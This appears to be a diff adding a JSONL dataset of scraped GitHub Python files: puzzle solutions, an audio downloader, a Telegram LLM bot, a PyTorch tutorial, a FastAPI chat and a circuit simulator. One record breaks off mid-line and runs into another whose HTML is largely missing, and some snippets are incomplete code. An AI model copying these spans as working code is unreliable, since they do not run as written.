diff --git "a/389.jsonl" "b/389.jsonl" new file mode 100644--- /dev/null +++ "b/389.jsonl" @@ -0,0 +1,459 @@ +{"seq_id":"26930175794","text":"N = int(input())\nsrc = list(map(int, input()))\ndst = list(map(int, input()))\n\ntests = []\nfor _ in range(4):\n tests.append(src.copy())\n\ntests[1][0] ^= 1\ntests[1][1] ^= 1\ntests[2][0] ^= 1\ntests[2][1] ^= 1\ntests[2][-1] ^= 1\ntests[2][-2] ^= 1\ntests[3][-1] ^= 1\ntests[3][-2] ^= 1\n\nfor t, test in enumerate(tests):\n count = [0, 1, 2, 1][t]\n for i in range(N - 2):\n if test[i] != dst[i]:\n test[i] ^= 1\n test[i+1] ^= 1\n test[i+2] ^= 1\n count += 1\n if test[-3:] == dst[-3:]:\n print(count)\n break\nelse:\n print(-1)\n","repo_name":"jinhwanlazy/problem-solving","sub_path":"boj_2138/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"27368944481","text":"import json\n\nfrom pydantic import BaseModel\n\nfrom local_migrator import Encoder, object_hook\n\n\nclass SampleModel(BaseModel):\n field1: int\n field2: str\n\n\ndata = SampleModel(field1=4, field2=\"abc\")\n\nwith open(\"sample.json\", \"w\") as f_p:\n json.dump(data, f_p, cls=Encoder)\n\nwith open(\"sample.json\") as f_p:\n data2 = json.load(f_p, object_hook=object_hook)\n\nassert data == data2\n","repo_name":"Czaki/local-migrator","sub_path":"examples/base_example.py","file_name":"base_example.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"33462744124","text":"import re\nimport os\nimport json\nimport uuid\nimport pytube\nimport requests\nimport sys\nfrom bs4 import BeautifulSoup\nfrom moviepy.audio.io.AudioFileClip import AudioFileClip\nimport urllib.request\nfrom logging import Logger\n\n\nclass AgeRestrictedError(Exception):\n \"\"\"Exception in case YouTube video is age restricted.\"\"\"\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return f\"{self.__class__.__name__}: {self.message}\"\n\n\nclass AudioExporter():\n \"\"\"Class for extracting the audio from YouTube \n and Coub and cropping it to an mp3 of custom duration\"\"\"\n\n def __init__(self, logger: Logger, max_allowed_duration: int):\n self.logger = logger\n self.max_allowed_duration = max_allowed_duration\n self.folder_name_regex = re.compile(r'[^\\w\\-_. 
]')\n self.youtube_url_regex = re.compile(\n r'^(?:https?://)?(?:www\\.)?(?:youtube\\.com/watch\\?v=|youtu.be/)([\\w-]{11})(?:\\S+)?$'\n )\n self.coub_url_regex = re.compile(\n r\"^(?:https?://)?(?:www\\.)?coub\\.com/view/([a-zA-Z0-9]+)$\")\n\n def _normalize_folder_name(self, folder_name: str):\n # Replace any invalid characters with underscores\n folder_name = self.folder_name_regex.sub('_', folder_name)\n\n # Remove leading/trailing whitespace\n folder_name = folder_name.strip()\n\n # Remove any consecutive underscores\n folder_name = re.sub('_{2,}', '_', folder_name)\n\n if sys.platform.startswith('win'):\n # Limit folder name to 255 characters (max allowed by NTFS file system)\n folder_name = folder_name[:255]\n\n return folder_name\n\n def _validate_youtube_url(self, url: str) -> bool:\n self.logger.info(f\"Checking if '{url}' is a valid YouTube URL\")\n match = self.youtube_url_regex.match(url)\n if match:\n return True\n else:\n return False\n\n def _validate_against_allowed_duration(self, duration: int):\n self.logger.info(\n f\"Validating that requested clip duration ({duration}) does not exceed allowed ({self.max_allowed_duration})\"\n )\n if duration > self.max_allowed_duration:\n raise Exception(\n f\"Clip duration exceeds allowed max duration: '{self.max_allowed_duration}'\"\n )\n\n def _validate_coub_url(self, url: str) -> bool:\n self.logger.info(f\"Checking if '{url}' is a valid Coub URL\")\n if self.coub_url_regex.match(url):\n return True\n else:\n return False\n\n def _get_coub_video_id(self, url: str) -> str:\n self.logger.info(f\"Get Coub video id from URL: '{url}'\")\n match = self.coub_url_regex.match(url)\n\n if match:\n video_id = match.group(1)\n self.logger.info(f\"Extracted video ID is {video_id}\")\n return video_id\n else:\n raise ValueError('Failed to get video id from Coub URL')\n\n def _download_coub_video(self, url) -> str:\n # Send a GET request to the URL\n response = urllib.request.urlopen(url)\n\n # Parse the HTML content using BeautifulSoup\n soup = BeautifulSoup(response, 'html.parser')\n html = soup.prettify()\n # Find the video element and extract the source URL\n video_element = soup.find(id='coubPageCoubJson')\n if video_element is None:\n raise ValueError('No video element found')\n coub_details = json.loads(video_element.text)\n audio_url = coub_details[\"file_versions\"]['html5']['audio']['high'][\n 'url'] # type: ignore\n self.logger.info(f\"Extracted audio url for coub: '{audio_url}'\")\n video_id = self._get_coub_video_id(url)\n # create a folder with the video title\n folder_name = self._normalize_folder_name(video_id)\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n file_name = f\"{video_id}.mp4\"\n download_path = os.path.join(folder_name, file_name)\n self.logger.info(f\"storing downloaded video as {file_name}\")\n\n if audio_url is None:\n raise ValueError('Audio URL was not extracted')\n\n response = requests.get(audio_url)\n with open(download_path, 'wb') as f:\n f.write(response.content)\n\n return download_path\n\n def _download_youtube_video(self, url: str) -> str:\n # Create a YouTube object using the video URL\n youtube = pytube.YouTube(url)\n\n if youtube.age_restricted:\n self.logger.error(f\"YouTube video ({url}) is age-restricted\")\n raise AgeRestrictedError(\n 'The video is age restricted and cannot be downloaded')\n\n title = youtube.title\n\n self.logger.info(f\"Working with video '{title}'\")\n\n # create a folder with the video title\n folder_name = self._normalize_folder_name(youtube.video_id)\n if not 
os.path.exists(folder_name):\n os.mkdir(folder_name)\n\n audio_stream = youtube.streams.filter(only_audio=True).first()\n\n # check if video download was successful\n if audio_stream is None:\n raise ValueError('No audio stream found for video')\n\n # Get the audio stream of the YouTube video\n self.logger.info(\n f\"Downloading audio of YouTube video into {folder_name}\")\n return audio_stream.download(folder_name, f\"{youtube.video_id}.mp4\")\n\n def load_and_crop(self,\n url: str,\n full: bool,\n start: int = -1,\n end: int = -1) -> str:\n if not full:\n if start <= -1:\n prefix = '' if start == -1 else 'non-negative'\n raise ValueError(f\"{prefix} start value is required\")\n\n downloaded_file_path = ''\n\n if self._validate_youtube_url(url):\n downloaded_file_path = self._download_youtube_video(url)\n else:\n if self._validate_coub_url(url):\n downloaded_file_path = self._download_coub_video(url)\n\n if not downloaded_file_path:\n raise ValueError('Failed to download video')\n\n self.logger.info(\n f\"Working with downloaded file '{downloaded_file_path}'\")\n\n # use moviepy to extract the audio from the video and optionally clip it\n audio_clip = AudioFileClip(downloaded_file_path)\n\n if full:\n pass # use full audio\n else:\n audio_clip = self.validate_and_get_subclip(audio_clip, start, end)\n\n self._validate_against_allowed_duration(audio_clip.duration)\n\n output_path = os.path.join(f\"{uuid.uuid4()}.mp3\")\n\n self.logger.info(f\"Storing mp3 as {output_path}\")\n audio_clip.write_audiofile(output_path)\n\n # delete the original video file\n audio_clip.close()\n self.logger.info(f\"Removed {audio_clip.filename}\")\n\n os.remove(downloaded_file_path)\n return output_path\n \n def validate_and_get_subclip(self, audio_clip: AudioFileClip, start: int, end: int) -> AudioFileClip:\n if start >= audio_clip.duration:\n raise ValueError(\n 'start value is more or equal to duration of clip which doesn\\'t make sense'\n )\n if not end:\n self.logger.debug(\n f\"No --end value received. Setting it to the video duration: {audio_clip.duration}\"\n )\n end = audio_clip.duration\n else:\n if start >= end:\n raise ValueError('end value must be more than start value')\n if end > audio_clip.duration:\n self.logger.warn(\n f\"Clip duration is less than requested end time. 
Falling back to duration '{audio_clip.duration}'\"\n )\n end = audio_clip.duration\n self.logger.info(f\"Creating a subclip [{start};{end}]\")\n audio_clip = audio_clip.subclip(start, end)\n return audio_clip","repo_name":"Kerlione/sound-cropper-discord-bot","sub_path":"src/audio_exporter.py","file_name":"audio_exporter.py","file_ext":"py","file_size_in_byte":7979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31734316739","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 7 07:26:20 2019\n\n@author: tonpoppe\n\"\"\"\nimport time\nfrom datetime import datetime\nimport numpy as np\nimport tensorflow as tf\nimport networkx as nx\nfrom GAE.model import GraphAutoEncoderModel\nfrom GAE.data_feeder_nx import DataFeederNx\nfrom GAE.graph_reconstructor import GraphReconstructor\nfrom pyvis import network as net\nfrom PIL import Image\n\nclass Tools:\n \"\"\" class for tools on GraphCASE\n \"\"\"\n @staticmethod\n def plot_node(graph, node_id):\n \"\"\" sttic method to plot the 2 hub neighbourhood of a node in the graph.\n Args:\n graph: graph containing the node to plot.\n node_id: The id of the node to plot.\n \n \"\"\"\n und_graph = graph.to_undirected().copy()\n local_graph = [node_id] + list(und_graph.neighbors(node_id))\n for neightbor in und_graph.neighbors(node_id):\n local_graph = local_graph + [n for n in und_graph.neighbors(neightbor)]\n local_graph = list(set(local_graph)) # make list unique\n subgraph = graph.subgraph(local_graph)\n\n # plot subgraph\n nt = net.Network(notebook=True, directed=True)\n nt.from_nx(subgraph)\n # nt.set_edge_smooth('straightCross')\n length_dict = nx.single_source_dijkstra_path_length(und_graph, node_id, 2, weight=lambda u, v, d: 1)\n color_dict = {0: 'red', 1: 'lightblue', 2: 'lightgreen'}\n for node in nt.nodes:\n node[\"color\"] = color_dict[length_dict[node['id']]]\n node['shape'] = 'circle'\n for edge in nt.edges:\n edge['label'] = round(edge['weight'], 2)\n nt.toggle_physics(False)\n return nt\n\n @staticmethod\n def plot_layer(features, size):\n \"\"\"\n function to visualise a layer where each value is represented with a size x size format.\n \n Args:\n features: 2-d numpy array containing one row per node and for every node the node \n and corresponding edge properties.\n size: pixel size, the number of horizontal and vertical pixels used to\n visualize one value.\n\n A png of equal size of the feature numpy x size.\n \"\"\"\n\n #expend the pixels width and height to size-value\n pixels = np.repeat(features, size, axis=1)\n pixels = np.repeat(pixels, size, axis=0)\n\n # rescale between 0 and 255\n pixels = pixels * 255\n pixels = pixels.astype(np.uint8)\n\n im = Image.fromarray(pixels)\n\n return im ","repo_name":"tonyPo/GraphCase","sub_path":"GAE/graph_case_tools.py","file_name":"graph_case_tools.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"37318194524","text":"import socket\nfrom time import sleep\n\nsock = socket.socket()\nsock.setblocking(1)\nsock.connect(('localhost', 9090))\nwhile True:\n msg = input()\n sock.send(msg.encode())\n if msg == 'exit':\n break\n\n data = sock.recv(1024)\n 
print(data.decode())\nsock.close()\n","repo_name":"JuliaHaqq/1_echo_server_PI20-5","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7000544152","text":"from enhanced_display import Enhanced_Display\nimport time\n\nif __name__ == \"__main__\":\n\n display = Enhanced_Display()\n\n # Load the list of fonts to use\n display.load_fonts(['digits-30', 'text-16', 'icons-32', 'icons-128'])\n\n # Display the Welcome screen\n display.fill(0) # Clear the screen\n\n display.select_font('icons-128')\n display.text('s', 0, 0) # The 's' character is the Star icon\n display.select_font('text-16')\n display.text('Welcome', 0, 0, 1, 1) # Center the text both horizontally and vertically.\n\n display.save_screenshot(\"title.bmp\") # Take a screenshot and save to file.\n\n display.show()\n time.sleep(3)\n\n # Display the Text Alignment intro screen\n display.fill(0)\n\n display.text('Text', 0, 16, 1)\n display.text('Alignment', 0, 32, 1)\n\n display.show()\n time.sleep(1)\n\n # Display the left aligned text screen\n display.fill(0)\n\n display.text('left, top', 0, 0)\n display.text('left, center', 0, 0, 0, 1)\n display.text('left, bottom', 0, 0, 0, 2)\n\n display.show()\n time.sleep(1)\n\n # Display the center aligned text screen\n display.fill(0)\n\n display.text('center, top', 0, 0, 1, 0)\n display.text('center, center', 0, 0, 1, 1)\n display.text('center, bottom', 0, 0, 1, 2)\n\n display.show()\n time.sleep(1)\n\n # Display the right aligned text screen\n display.fill(0)\n\n display.text('right, top', 0, 0, 2, 0)\n display.text('right, center', 0, 0, 2, 1)\n display.text('right, bottom', 0, 0, 2, 2)\n\n display.show()\n time.sleep(1)\n\n # Display the Text & Icons intro screen\n display.fill(0)\n\n display.text('Text', 0, 8, 1)\n display.text('&', 0, 24, 1)\n display.text('Icons', 0, 40, 1)\n\n display.show()\n time.sleep(1.5)\n\n # Display the Temperature screen\n display.fill(0)\n\n display.select_font('digits-30')\n degrees = '\\u00b0' # Character code for the degrees symbol\n display.text(f'12.3{degrees}', 0, 0, 1, 1)\n display.select_font('icons-32')\n display.text('t', 0, 0, 2) # The 't' character contains the temperature icon\n display.select_font(None) # Select the built in 8 pixel font\n display.text('Temperature', 0, 0, 1, 2)\n\n display.show()\n time.sleep(2)\n\n # Display the Humidity screen\n display.fill(0)\n\n display.select_font('digits-30')\n display.text('76', 0, 0, 1, 1)\n display.select_font('icons-32')\n display.text('h', 0, 0, 2) # The 'h' character contains the humidity icon\n display.select_font(None)\n display.text('Humidity', 0, 0, 1, 2)\n\n display.show()\n time.sleep(2) \n\n # Display the Pressure screen\n display.fill(0)\n\n display.select_font('digits-30')\n display.text('985', 0, 0, 1, 1, display.width - 32)\n display.select_font('icons-32')\n display.text('p', 0, 0, 2) # The 'p' character contains the pressure icon\n display.select_font(None)\n display.text('Pressure', 0, 0, 1, 2)\n\n display.show()\n time.sleep(2)\n\n # Display the Thank you screen\n display.fill(0)\n\n display.select_font('icons-128')\n display.text('s', 0, 0)\n display.select_font('text-16')\n display.text('Thank you', 0, 0, 1, 1)\n 
display.show()\n","repo_name":"mark-gladding/packed-font","sub_path":"display/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"23847761376","text":"import torch\r\n\r\nx = torch.ones(5) # input tensor\r\ny = torch.zeros(3) # expected output\r\nw = torch.randn(5, 3, requires_grad=True)\r\nb = torch.randn(3, requires_grad=True)\r\nz = torch.matmul(x, w)+b\r\nloss = torch.nn.functional.binary_cross_entropy_with_logits(z, y)\r\n\r\nprint('Gradient function for z =',z.grad_fn)\r\nprint('Gradient function for loss =', loss.grad_fn)\r\n\r\n# Computes the gradient\r\nloss.backward()\r\nprint(w.grad)\r\nprint(b.grad)\r\n\r\n# Disables gradient tracking\r\nz = torch.matmul(x, w)+b\r\nprint(z.requires_grad)\r\n\r\nwith torch.no_grad():\r\n z = torch.matmul(x, w)+b\r\nprint(z.requires_grad)\r\n\r\n# Makes a jacobian product instead of a gradient\r\ninp = torch.eye(5, requires_grad=True)\r\nout = (inp+1).pow(2)\r\nout.backward(torch.ones_like(inp), retain_graph=True)\r\nprint(\"First call\\n\", inp.grad)\r\nout.backward(torch.ones_like(inp), retain_graph=True)\r\nprint(\"\\nSecond call\\n\", inp.grad)\r\ninp.grad.zero_()\r\nout.backward(torch.ones_like(inp), retain_graph=True)\r\nprint(\"\\nCall after zeroing gradients\\n\", inp.grad)\r\n\r\n# Initialize the loss function\r\nloss_fn = nn.CrossEntropyLoss()\r\n\r\n# Initialize opitmzation\r\noptimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)\r\n\r\n# Train_loop loops over the opiztation code, test_loop evaules models performace agasint the test_data\r\ndef train_loop(dataloader, model, loss_fn, optimizer):\r\n size = len(dataloader.dataset)\r\n for batch, (X, y) in enumerate(dataloader):\r\n # Compute prediction and loss\r\n pred = model(X)\r\n loss = loss_fn(pred, y)\r\n\r\n # Backpropagation\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if batch % 100 == 0:\r\n loss, current = loss.item(), batch * len(X)\r\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\r\n\r\n\r\ndef test_loop(dataloader, model, loss_fn):\r\n size = len(dataloader.dataset)\r\n test_loss, correct = 0, 0\r\n\r\n with torch.no_grad():\r\n for X, y in dataloader:\r\n pred = model(X)\r\n test_loss += loss_fn(pred, y).item()\r\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\r\n\r\n test_loss /= size\r\n correct /= size\r\n print(f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\r\n\r\n# Initzliaes the loss function and opizator and passes it to the test_loop, train_loop\r\nloss_fn = nn.CrossEntropyLoss()\r\noptimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)\r\n\r\nepochs = 10\r\nfor t in range(epochs):\r\n print(f\"Epoch {t+1}\\n-------------------------------\")\r\n train_loop(train_dataloader, model, loss_fn, optimizer)\r\n test_loop(test_dataloader, model, loss_fn)\r\nprint(\"Done!\")\r\n\r\n# Let off here:https://pytorch.org/tutorials/beginner/basics/saveloadrun_tutorial.html\r\n","repo_name":"Appleriot/Machine_Learning","sub_path":"autograd.py","file_name":"autograd.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28270021761","text":"import logging\nimport os\nimport time\nfrom openai.error import OpenAIError\nimport requests\nfrom telegram import Update\nfrom telegram.ext import ContextTypes\nfrom src.qa.chain import 
create_chain\n\n# TODO: hide langchain from telegrambot.py\nimport datetime\nfrom langchain.callbacks import get_openai_callback\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO\n)\n\nDEFAULT_PROMPT_TEMPLATE = \"\"\"Assistant is a large language model trained by OpenAI.\n Assistant is designed to be able to assist with a wide range of tasks, from answering simple questions to providing in-depth explanations and discussions on a wide range of topics. As a language model, Assistant is able to generate human-like text based on the input it receives, allowing it to engage in natural-sounding conversations and provide responses that are coherent and relevant to the topic at hand.\n Assistant is constantly learning and improving, and its capabilities are constantly evolving. It is able to process and understand large amounts of text, and can use this knowledge to provide accurate and informative responses to a wide range of questions. Additionally, Assistant is able to generate its own text based on the input it receives, allowing it to engage in discussions and provide explanations and descriptions on a wide range of topics.\n Overall, Assistant is a powerful tool that can help with a wide range of tasks and provide valuable insights and information on a wide range of topics. Whether you need help with a specific question or just want to have a conversation about a particular topic, Assistant is here to assist.\n {history}\n Human: {human_input}\n Assistant:\"\"\"\nDEFAULT_START_MESSAGE = \"Hello, I'm an AI-powered chatbot 😊\\nSend me a message and I'll try to answer it.\"\n\n\nclass BotApp:\n def __init__(self):\n # You can adjust the template as needed. Reload the bot to apply changes.\n self.chains = {}\n self.prompt_template = os.environ.get(\n \"PROMPT_TEMPLATE\", DEFAULT_PROMPT_TEMPLATE)\n self.is_verbose = os.environ.get(\"VERBOSE\") == \"1\"\n self.source_text = None\n self.source_text_version = None\n\n async def get_source_text(self, source_text_url):\n print(\"[INFO] fetching source text from\", source_text_url)\n version = int(time.time())\n response = requests.get(\"{}?_v={}\".format(source_text_url, version))\n self.source_text_version = version\n return response.text\n\n async def handle_start(self, update: Update, ctx: ContextTypes.DEFAULT_TYPE):\n await ctx.bot.send_message(chat_id=update.effective_chat.id,\n text=os.environ.get(\"START_MESSAGE\", DEFAULT_START_MESSAGE))\n\n async def handle_text(self, update: Update, ctx: ContextTypes.DEFAULT_TYPE):\n text = update.message.text\n\n chat_id = update.message.chat.id\n sender_name = update.message.from_user.username or update.message.from_user.first_name\n is_group = update.message.chat.type == \"group\"\n is_reply = update.message.reply_to_message\n\n # Refresh source_text every 60 seconds\n if self.source_text_version is None or int(time.time()) - self.source_text_version >= 60:\n self.source_text = await self.get_source_text(os.environ.get(\"QA_TEXT_URL\"))\n\n # Prepare session for the user\n chain = self.chains.get(chat_id)\n if not chain:\n # chain is unique per chat\n # chain = create_chain(self.prompt_template, self.is_verbose) # if using src.llm\n\n chain = create_chain(\n self.source_text, self.is_verbose) # if using src.qa\n\n self.chains[chat_id] = chain\n logging.info(\" new chain created: %d\", chat_id)\n\n if text.lower() == \"ping\":\n await ctx.bot.send_message(chat_id=update.effective_chat.id,\n text=\"pong!\")\n else:\n start_time = 
datetime.datetime.now()\n\n if is_group:\n # Skip if message is from group but doesn't have mention\n if not text.startswith(f\"@{ctx.bot.username}\"):\n return\n # Remove mention from the text\n text = text[len(f\"@{ctx.bot.username}\") + 1:]\n\n # Use reply text as prompt\n if is_reply:\n text = f\"{text}: {update.message.reply_to_message.text}\"\n\n logging.info(\"[message] new %smessage from %s\",\n \"group \" if is_group else \"\", sender_name)\n\n with get_openai_callback() as cb:\n await ctx.bot.send_chat_action(chat_id=update.effective_chat.id,\n action=\"typing\")\n logging.info(\" predicting...\")\n\n try:\n output = chain.predict(human_input=text)\n bot_reply = output\n except OpenAIError as e:\n logging.error(\"OpenAIError: %s\", e)\n bot_reply = \"Sorry, I seem to have some issues 😕\\nPlease try again later.\"\n\n await ctx.bot.send_message(chat_id=update.effective_chat.id,\n text=bot_reply)\n\n logging.info(\" human_input: %s\", text)\n logging.info(\" output: %s\", bot_reply)\n logging.info(\" total_tokens: %d\", cb.total_tokens)\n logging.info(\" time_elapsed_ms: %d ms\",\n (datetime.datetime.now() - start_time).microseconds / 1000)\n","repo_name":"wzulfikar/langchain-playground","sub_path":"src/bot_app.py","file_name":"bot_app.py","file_ext":"py","file_size_in_byte":5610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21631830838","text":"# OBJECT 1: Write a python program to check of the \n# given string is palindrome or not using stack.\n\nclass stack():\n def __init__(self):\n self.mylist = []\n def pop(self):\n return self.mylist.pop()\n def push(self,val):\n self.mylist.append(val)\n\na = input(\"Input a string: \") \nmystack=stack()\nfor i in a:\n mystack.push(i)\nb=\"\"\nfor i in a:\n b+=mystack.pop()\nif (a==b):\n print(\"Its a palindrome string\")\nelse:\n print(\"its not a palindrome string\")\n\n\n\n\n\n\n\n","repo_name":"qasim29/DSA_LABS","sub_path":"LAB_6_OBJ_1.py","file_name":"LAB_6_OBJ_1.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"19708838682","text":"from django.db import models\nfrom main.models import Product\n\n\nclass Orders(models.Model):\n STATE_CHOICES = (\n ('NotProcessed', 'Not Processed'),\n ('InProgress', 'InProgress'),\n ('Processed', 'Processed'),\n )\n user_name = models.CharField('Name', max_length=100)\n user_surname = models.CharField('Surname', max_length=100)\n email = models.EmailField('Email')\n number_phone = models.CharField(max_length=20)\n city = models.CharField(max_length=100)\n house_number = models.CharField(max_length=50)\n street = models.CharField(max_length=100)\n product = models.ManyToManyField(Product, through='OrderItem')\n state = models.CharField('State', max_length=20, choices=STATE_CHOICES, default='NotProcessed')\n\n\nclass OrderItem(models.Model):\n order = models.ForeignKey(Orders, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n quantity = models.PositiveIntegerField('Quantity product')\n","repo_name":"OleksandrSelehei/Django_Project_1","sub_path":"webShopPrototypeDjango/ShopPrototype/cart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} 
+{"seq_id":"28205994379","text":"n=int(input())\r\np=q=r=[]\r\np=input().split()\r\nq=input().split()\r\nr=input().split()\r\nc=0\r\nf=[]\r\ng=[]\r\nh=[]\r\nfor x in q:\r\n if f.count(x)==0:\r\n f.append(x)\r\nfor x in r:\r\n if g.count(x)==0:\r\n g.append(x)\r\nfor x in p:\r\n for y in f:\r\n if int(x)\n\n \n Chat\n \n \n

WebSocket Chat

\n

Your ID:

\n
\n \n \n
\n \n \n \n\n\"\"\"\n\n\nclass ConnectionManager:\n def __init__(self):\n self.active_connections: List[WebSocket] = []\n\n async def connect(self, websocket: WebSocket):\n await websocket.accept()\n self.active_connections.append(websocket)\n\n def disconnect(self, websocket: WebSocket):\n self.active_connections.remove(websocket)\n\n async def send_personal_message(self, message: str, websocket: WebSocket):\n await websocket.send_text(message)\n\n async def broadcast(self, message: str):\n for connection in self.active_connections:\n await connection.send_text(message)\n\n\nmanager = ConnectionManager()\n\n@router.post(\"/create_room\")\nasync def create_room(request: RoomCreateRequest, token: str = Depends(oauth2_scheme)):\n print( f'request sosat {request.uid}' )\n res = await insert_room(request.uid, request.room_name, rooms_collection)\n logging.info(f\"CREATE_ROOM: request.username: {request.username}, room_name: {request.room_name}\")\n return {'201': 'room created'}\n\n@router.get(\"/rooms\")\nasync def rooms(token: str = Depends(oauth2_scheme)):\n rooms = await get_rooms()\n return rooms\n\n@router.get(\"/room/{room_name}\")\nasync def search_room(room_name, token: str = Depends(oauth2_scheme)):\n room = await get_room(room_name)\n return room\n\n@router.post(\"/create_message\")\nasync def create_message(request: MessageCreateRequest, token: str = Depends(oauth2_scheme)):\n res = await insert_message(request.username, request.content, message_collection)\n logging.info(f\"SEND_MESSAGE: request.username: {request.username}, request.content: {request.content}\")\n return {'201': 'room created'}\n\n@router.get(\"/messages\")\nasync def messages(token: str = Depends(oauth2_scheme)):\n \"\"\"\n List message \n \"\"\"\n messages = await get_messages()\n return messages\n\n@router.get(\"/\") \nasync def get():\n return HTMLResponse(html)\n\n\n@router.websocket(\"/ws/{client_id}\")\nasync def websocket_endpoint(websocket: WebSocket, client_id: int):\n\n \"\"\"\n\n Подключение к серверу\n Ендпоинт вебсокета который демонстрирует общение.\n\n Поменять данный вебсокет именно под комнату для отправки сообщений\n \n\n \"\"\"\n\n\n await manager.connect(websocket)\n try:\n while True:\n data = await websocket.receive_text()\n await manager.send_personal_message(f\"You wrote: {data}\", websocket)\n await manager.broadcast(f\"Client #{client_id} says: {data}\")\n # await send_message(roomId, userId, message)\n await send_message(\"601ff693fb7694b194f391f5\", \"601faca84b9a40393eb936db\", data)\n \n print(f\"You wrote: {data}\", websocket)\n print(f\"Client #{client_id} says: {data}\")\n\n except WebSocketDisconnect:\n manager.disconnect(websocket)\n await manager.broadcast(f\"Client #{client_id} left the chat\")\n print(f\"Client #{client_id} left the chat\")\n","repo_name":"LofyVintaj/Vi","sub_path":"src/chat/v1/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"5347590354","text":"from circuitSimulatorBase import CircuitSimulatorBase\nfrom nmosFet import NmosFet\nfrom wire import Wire\n\nclass CircuitSimulator(CircuitSimulatorBase):\n def __init__(self):\n CircuitSimulatorBase.__init__(self)\n\n def doWireRecalc(self, wireIndex):\n if wireIndex == self.gndWireIndex or wireIndex == self.vccWireIndex:\n return\n\n group = set()\n self.addWireToGroup(wireIndex, group)\n \n newValue = self.getWireValue(group)\n newHigh = newValue == Wire.HIGH or newValue == 
Wire.PULLED_HIGH or \\\n newValue == Wire.FLOATING_HIGH\n\n for groupWireIndex in group:\n if groupWireIndex == self.gndWireIndex or \\\n groupWireIndex == self.vccWireIndex:\n # TODO: remove gnd and vcc from group?\n continue\n simWire = self.wireList[groupWireIndex]\n simWire.state = newValue\n for transIndex in simWire.gateInds:\n\n t = self.transistorList[transIndex]\n\n if newHigh == True and t.gateState == NmosFet.GATE_LOW:\n self.turnTransistorOn(t)\n if newHigh == False and t.gateState == NmosFet.GATE_HIGH:\n self.turnTransistorOff(t)\n\n def turnTransistorOn(self, t):\n t.gateState = NmosFet.GATE_HIGH\n\n wireInd = t.side1WireIndex\n if self.newRecalcArray[wireInd] == 0:\n self.newRecalcArray[wireInd] = 1\n self.newRecalcOrder[self.newLastRecalcOrder] = wireInd\n self.newLastRecalcOrder += 1\n\n wireInd = t.side2WireIndex\n if self.newRecalcArray[wireInd] == 0:\n self.newRecalcArray[wireInd] = 1\n self.newRecalcOrder[self.newLastRecalcOrder] = wireInd\n self.newLastRecalcOrder += 1\n\n def turnTransistorOff(self, t):\n t.gateState = NmosFet.GATE_LOW\n\n c1Wire = t.side1WireIndex\n c2Wire = t.side2WireIndex\n self.floatWire(c1Wire)\n self.floatWire(c2Wire)\n\n wireInd = c1Wire\n if self.newRecalcArray[wireInd] == 0:\n self.newRecalcArray[wireInd] = 1\n self.newRecalcOrder[self.newLastRecalcOrder] = wireInd\n self.newLastRecalcOrder += 1\n\n wireInd = c2Wire\n if self.newRecalcArray[wireInd] == 0:\n self.newRecalcArray[wireInd] = 1\n self.newRecalcOrder[self.newLastRecalcOrder] = wireInd\n self.newLastRecalcOrder += 1\n\n\n def getWireValue(self, group):\n # TODO PERF: why turn into a list?\n l = list(group)\n sawFl = False\n sawFh = False\n value = self.wireList[l[0]].state\n\n for wireIndex in group:\n if wireIndex == self.gndWireIndex:\n return Wire.GROUNDED\n if wireIndex == self.vccWireIndex:\n if self.gndWireIndex in group:\n return Wire.GROUNDED\n else:\n return Wire.HIGH\n wire = self.wireList[wireIndex]\n if wire.pulled == Wire.PULLED_HIGH:\n value = Wire.PULLED_HIGH\n elif wire.pulled == Wire.PULLED_LOW:\n value = Wire.PULLED_LOW\n \n if wire.state == Wire.FLOATING_LOW:\n sawFl = True\n elif wire.state == Wire.FLOATING_HIGH:\n sawFh = True\n\n if value == Wire.FLOATING_LOW or value == Wire.FLOATING_HIGH:\n # If two floating regions are connected together,\n # set their voltage based on whichever region has\n # the most components. 
